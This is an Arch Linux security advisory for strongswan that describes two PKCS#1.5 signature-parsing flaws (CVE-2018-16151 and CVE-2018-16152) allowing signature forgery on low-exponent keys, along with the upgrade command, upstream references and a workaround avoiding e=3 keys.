ArchLinux: 201809-4: strongswan: authentication bypass
Summary
- CVE-2018-16151 (authentication bypass)
The OID parser allows any number of random bytes after a valid OID for
a PKCS#1.5 signature. The asn1_known_oid() function just parses until
it finds a leaf in the tree of known OIDs, any further data that
follows is simply ignored. And the function that parses ASN.1
algorithmIdentifier structures doesn't care if the full OID data was
parsed as it usually doesn't really matter. A missing check to reject
junk and random key parameters allows attackers to carry out a
Bleichenbacher-style attack on low-exponent keys and create forged
signatures.
- CVE-2018-16152 (authentication bypass)
The algorithmIdentifier structure on a PKCS#1.5 signature contains an
optional parameters field. While none of the algorithms used with
PKCS#1 use parameters, i.e. the field should always be encoded as ASN.1
NULL value, the strongswan decoder doesn't enforce this and simply
skips over the parameters. This allows an attacker to fill the field
with random data which allows to carry out a Bleichenbacher-style
attack on low-exponent keys and forge signatures or create arbitrary CA
certificates.
Resolution
Upgrade to 5.7.0-1.
# pacman -Syu "strongswan>=5.7.0-1"
The problems have been fixed upstream in version 5.7.0.
References
https://wiki.strongswan.org/versions/70 https://github.com/strongswan/strongswan/commit/5955db5b124a1ee5f44c0845b6e00c86fddae67c https://security.archlinux.org/CVE-2018-16151 https://security.archlinux.org/CVE-2018-16152
Workaround
If the gmp plugin is loaded, make sure that none of the employed keysand certificates (including those of CAs) use keys with e = 3.Strongswan's tool to generate keys (pki --gen) always used e = 65537(0x10001), which is not vulnerable, so certificates and keys generatedwith this tool are fine for use even with an unpatched gmp plugin.